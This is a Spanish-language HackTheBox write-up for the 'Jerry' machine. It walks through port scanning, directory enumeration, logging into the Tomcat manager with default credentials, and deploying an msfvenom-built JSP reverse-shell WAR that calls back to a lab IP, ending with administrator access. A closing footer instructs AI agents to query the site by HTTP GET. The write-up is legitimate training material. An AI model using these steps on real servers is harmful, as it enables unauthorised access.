# Jerry

Jerry es posiblemente la caja más fácil en HackTheBox. Hay una instalación de Tomcat con una contraseña predeterminada para el Administrador de aplicaciones web. Lo usaré para cargar un archivo WAR, que devuelve un shell del sistema y acceso a ambas banderas. ### Enumeración #### NMAP Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima. ``` nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.10.95 ```

Únicamente está abierta el puerto 8080 TCP en la máquina objetivo. ``` nmap -p8080 -sVC -vv 10.10.10.95 ```

Un servicio abierto: * Puerto 8080 -> Apache Tomcat JSP Engine 1.1 #### Enumeración web Vamos a ver el contenido del puerto 8080 en el navegador web.

Vemos una página por defecto de un servidor Apache Tomcat. El siguiente paso, realizar una enumeración de directorios. Para ello, vamos a utilizar la herramienta [dirsearch](https://github.com/maurosoria/dirsearch). ``` dirsearch -u "http://10.10.10.95:8080/" -w '/home/kali/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt' -r ```

Después de investigar cada uno de los resultados anteriores, el más interesante es el directorio /manager, que nos pide credenciales para iniciar sesión. Vamos a comenzar con las credenciales por defecto por excelencia admin/admin.

Con las credenciales admin/admin, tenemos acceso denegado. Si analizamos un poco el resutlado devuelto, podemos ver las credenciales por defecto de Apache Tomcat. Vamos a probar de nuevo con estas credenciales.

Accedemos al gestor del servidor Apache Tomcat. Vamos a investigar un poco en busca de posibles puntos vulnerables.

### Elevación de privilegios Para obtener un shell, vamos a utilizar la sección "WAR file to deploy" de la aplicación del administrador. Un archivo de recursos de aplicaciones web (WAR) es un contenedor de un solo archivo que contiene todos los archivos potenciales necesarios para una aplicación web basada en Java. Puede tener archivos de Java (.jar), páginas de servidor de Java (.jsp), servlets de Java, clases de Java, páginas web, css, etc. Tomcat Manager facilita la implementación de archivos WAR con un par de clics y, dado que estos pueden contener código Java, es un excelente objetivo para lograr la ejecución. #### Crear archivo WAR Vamos a utilziar msfvenom para crear un shell inverso de Windows que pueda ser capturado con netcat. La creamos de la siguiente manera: ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > securiters.warUna vez creado el archivo, procedemos a subirlo al servidor y al mismo, tiempo habilitamos un oyente en el puerto que hayamos habilitado en el archivo malicioso creado. ``` El siguiente paso será por un lado, ejecutar el archivo creado en el navegador y por otro lado habilitar un oyente en el puerto habilitado en el archivo malicioso.

Shell activa en el oyente. Tenemos privilegios root

Obtenemos shell como administradores, ya solo nos falta buscar ambas flags. Ambas flags se encuentran en el directorio ``` C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" ```

Ya tendriamos el CTF Jerry de HTB acabado. {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.securiters.com/securiters-wiki/write-ups/hack-the-box/jerry.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.